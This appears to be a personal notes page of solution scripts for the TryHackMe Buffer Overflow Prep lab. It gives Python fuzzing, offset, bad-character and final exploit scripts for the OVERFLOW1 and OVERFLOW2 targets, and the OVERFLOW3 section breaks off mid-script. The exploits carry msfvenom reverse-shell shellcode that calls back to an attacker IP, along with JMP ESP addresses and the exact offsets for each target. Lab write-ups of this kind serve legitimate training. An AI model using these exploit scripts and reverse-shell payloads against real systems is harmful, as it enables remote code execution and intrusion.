日常记录

TryHackMe Buffer Overflow Prep

https://anonymfile.com/RdEJW/bof.zip

OVERFLOW1

FUZZ

#!/usr/bin/env python3
# fuzz.py
import socket, time, sys

ip = "10.10.90.129"

port = 1337
timeout = 5
prefix = "OVERFLOW1 "

string = prefix + "A" * 100

while True:
	try:
		with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
			s.settimeout(timeout)
			s.connect((ip, port))
			s.recv(1024)
			print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
			s.send(bytes(string, "latin-1"))
			s.recv(1024)
	except:
		print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
		sys.exit(0)
	string += 100 * "A"
	time.sleep(1)

Fuzzing crashed at 2000 bytes

OFFSET

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000

#!/usr/bin/env python3
# offset.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW1 "
offset = 0
overflow = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"
retn = ""
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

EIP: 6F43396E -> oC9n -> n9Co

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q n9Co -l 2000

[*] Exact match at offset 1978

#!/usr/bin/env python3
# offset_confirm.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW1 "
offset = 1978
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

EIP: 42424242 -> BBBB

BADCHAR

#!/usr/bin/env python3
# charset.py
for x in range(1, 256):
	print("\\x" + "{:02x}".format(x), end='')
print()

#!/usr/bin/env python3
# badchar.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW1 "
offset = 1978
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

Not all of these might be badchars! Sometimes badchars cause the next byte to get corrupted as well, or even effect the rest of the string.

BADCHAR: \x00\x07\x08\x2e\x2f\xa0\xa1

#!/usr/bin/env python3
# badchar_confirm.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW1 "
offset = 1978
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x06\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2d\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\x9f\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

去掉BADCHAR\x07\x2e\xa0之后\x08\x2f\xa1不受影响

BADCHAR: \x00\x07\x2e\xa0

JMP ESP

Immunity Debugger

!mona jmp -r esp -cqb "\x00\x07\x2e\xa0"

0x625011af
0x625011bb
0x625011c7
0x625011d3
0x625011df
0x625011eb
0x625011f7
0x62501203
0x62501205

SHELLCODE

msfvenom -p windows/shell_reverse_tcp LHOST=10.17.42.96 LPORT=1337 -b "\x00\x07\x2e\xa0" -f c

EXPLOIT

#!/usr/bin/env python3
# exploit.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW1 "
offset = 1978
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16
payload = "\xda\xc9\xb8\xd5\x89\xee\x40\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x52\x31\x43\x17\x03\x43\x17\x83\x16\x8d\x0c\xb5\x64\x66\x52\x36\x94\x77\x33\xbe\x71\x46\x73\xa4\xf2\xf9\x43\xae\x56\xf6\x28\xe2\x42\x8d\x5d\x2b\x65\x26\xeb\x0d\x48\xb7\x40\x6d\xcb\x3b\x9b\xa2\x2b\x05\x54\xb7\x2a\x42\x89\x3a\x7e\x1b\xc5\xe9\x6e\x28\x93\x31\x05\x62\x35\x32\xfa\x33\x34\x13\xad\x48\x6f\xb3\x4c\x9c\x1b\xfa\x56\xc1\x26\xb4\xed\x31\xdc\x47\x27\x08\x1d\xeb\x06\xa4\xec\xf5\x4f\x03\x0f\x80\xb9\x77\xb2\x93\x7e\x05\x68\x11\x64\xad\xfb\x81\x40\x4f\x2f\x57\x03\x43\x84\x13\x4b\x40\x1b\xf7\xe0\x7c\x90\xf6\x26\xf5\xe2\xdc\xe2\x5d\xb0\x7d\xb3\x3b\x17\x81\xa3\xe3\xc8\x27\xa8\x0e\x1c\x5a\xf3\x46\xd1\x57\x0b\x97\x7d\xef\x78\xa5\x22\x5b\x16\x85\xab\x45\xe1\xea\x81\x32\x7d\x15\x2a\x43\x54\xd2\x7e\x13\xce\xf3\xfe\xf8\x0e\xfb\x2a\xae\x5e\x53\x85\x0f\x0e\x13\x75\xf8\x44\x9c\xaa\x18\x67\x76\xc3\xb3\x92\x11\xe6\x52\xb6\x81\x9e\x56\xc6\x44\x66\xde\x20\x2c\x88\xb6\xfb\xd9\x31\x93\x77\x7b\xbd\x09\xf2\xbb\x35\xbe\x03\x75\xbe\xcb\x17\xe2\x4e\x86\x45\xa5\x51\x3c\xe1\x29\xc3\xdb\xf1\x24\xf8\x73\xa6\x61\xce\x8d\x22\x9c\x69\x24\x50\x5d\xef\x0f\xd0\xba\xcc\x8e\xd9\x4f\x68\xb5\xc9\x89\x71\xf1\xbd\x45\x24\xaf\x6b\x20\x9e\x01\xc5\xfa\x4d\xc8\x81\x7b\xbe\xcb\xd7\x83\xeb\xbd\x37\x35\x42\xf8\x48\xfa\x02\x0c\x31\xe6\xb2\xf3\xe8\xa2\xc3\xb9\xb0\x83\x4b\x64\x21\x96\x11\x97\x9c\xd5\x2f\x14\x14\xa6\xcb\x04\x5d\xa3\x90\x82\x8e\xd9\x89\x66\xb0\x4e\xa9\xa2"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

OVERFLOW2

FUZZ

#!/usr/bin/env python3
# fuzz.py
import socket, time, sys

ip = "10.10.90.129"

port = 1337
timeout = 5
prefix = "OVERFLOW2 "

string = prefix + "A" * 100

while True:
	try:
		with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
			s.settimeout(timeout)
			s.connect((ip, port))
			s.recv(1024)
			print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
			s.send(bytes(string, "latin-1"))
			s.recv(1024)
	except:
		print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
		sys.exit(0)
	string += 100 * "A"
	time.sleep(1)

Fuzzing crashed at 700 bytes

OFFSET

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000

#!/usr/bin/env python3
# offset.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW2 "
offset = 0
overflow = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2A"
retn = ""
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

EIP: 76413176 -> vA1v -> v1Av

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q v1Av -l 700

[*] Exact match at offset 634

#!/usr/bin/env python3
# offset_confirm.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW2 "
offset = 634
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

EIP: 42424242 -> BBBB

BADCHAR

#!/usr/bin/env python3
# charset.py
for x in range(1, 256):
	print("\\x" + "{:02x}".format(x), end='')
print()

#!/usr/bin/env python3
# badchar.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW2 "
offset = 634
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

Not all of these might be badchars! Sometimes badchars cause the next byte to get corrupted as well, or even effect the rest of the string.

BADCHAR: \x00\x23\x24\x3c\x3d\x83\x84\xba\xbb

#!/usr/bin/env python3
# badchar_confirm.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW2 "
offset = 634
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x22\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3b\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x82\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

去掉BADCHAR\x23\x3c\x83\xba之后\x24\x3d\x84\xbb不受影响

BADCHAR: \x00\x23\x3c\x83\xba

JMP ESP

Immunity Debugger

!mona jmp -r esp -cqb "\x00\x23\x3c\x83\xba"

0x625011af
0x625011bb
0x625011c7
0x625011d3
0x625011df
0x625011eb
0x625011f7
0x62501203
0x62501205

SHELLCODE

msfvenom -p windows/shell_reverse_tcp LHOST=10.17.42.96 LPORT=1337 -b "\x00\x23\x3c\x83\xba" -f c

EXPLOIT

#!/usr/bin/env python3
# exploit.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW2 "
offset = 634
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16
payload = "\xfc\xbb\xbf\x2d\xd0\xfb\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x43\xc5\x52\xfb\xbb\x16\x33\x75\x5e\x27\x73\xe1\x2b\x18\x43\x61\x79\x95\x28\x27\x69\x2e\x5c\xe0\x9e\x87\xeb\xd6\x91\x18\x47\x2a\xb0\x9a\x9a\x7f\x12\xa2\x54\x72\x53\xe3\x89\x7f\x01\xbc\xc6\xd2\xb5\xc9\x93\xee\x3e\x81\x32\x77\xa3\x52\x34\x56\x72\xe8\x6f\x78\x75\x3d\x04\x31\x6d\x22\x21\x8b\x06\x90\xdd\x0a\xce\xe8\x1e\xa0\x2f\xc5\xec\xb8\x68\xe2\x0e\xcf\x80\x10\xb2\xc8\x57\x6a\x68\x5c\x43\xcc\xfb\xc6\xaf\xec\x28\x90\x24\xe2\x85\xd6\x62\xe7\x18\x3a\x19\x13\x90\xbd\xcd\x95\xe2\x99\xc9\xfe\xb1\x80\x48\x5b\x17\xbc\x8a\x04\xc8\x18\xc1\xa9\x1d\x11\x88\xa5\xd2\x18\x32\x36\x7d\x2a\x41\x04\x22\x80\xcd\x24\xab\x0e\x0a\x4a\x86\xf7\x84\xb5\x29\x08\x8d\x71\x7d\x58\xa5\x50\xfe\x33\x35\x5c\x2b\x93\x65\xf2\x84\x54\xd5\xb2\x74\x3d\x3f\x3d\xaa\x5d\x40\x97\xc3\xf4\xbb\x70\xe6\x19\xe9\xe0\x9e\x1b\xed\xe5\x67\x95\x0b\x8f\x87\xf3\x84\x38\x31\x5e\x5e\xd8\xbe\x74\x1b\xda\x35\x7b\xdc\x95\xbd\xf6\xce\x42\x4e\x4d\xac\xc5\x51\x7b\xd8\x8a\xc0\xe0\x18\xc4\xf8\xbe\x4f\x81\xcf\xb6\x05\x3f\x69\x61\x3b\xc2\xef\x4a\xff\x19\xcc\x55\xfe\xec\x68\x72\x10\x29\x70\x3e\x44\xe5\x27\xe8\x32\x43\x9e\x5a\xec\x1d\x4d\x35\x78\xdb\xbd\x86\xfe\xe4\xeb\x70\x1e\x54\x42\xc5\x21\x59\x02\xc1\x5a\x87\xb2\x2e\xb1\x03\xc2\x64\x9b\x22\x4b\x21\x4e\x77\x16\xd2\xa5\xb4\x2f\x51\x4f\x45\xd4\x49\x3a\x40\x90\xcd\xd7\x38\x89\xbb\xd7\xef\xaa\xe9\xd7\x0f\x55\x12"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

OVERFLOW3

FUZZ

#!/usr/bin/env python3
# fuzz.py
import socket, time, sys

ip = "10.10.90.129"

port = 1337
timeout = 5
prefix = "OVERFLOW3 "

string = prefix + "A" * 100

while True:
	try:
		with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
			s.settimeout(timeout)
			s.connect((ip, port))
			s.recv(1024)
			print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
			s.send(bytes(string, "latin-1"))
			s.recv(1024)
	except:
		print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
		sys.exit(0)
	string += 100 * "A"
	time.sleep(1)

Fuzzing crashed at 1300 bytes

OFFSET

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1300

#!/usr/bin/env python3
# offset.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW3 "
offset = 0
overflow = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1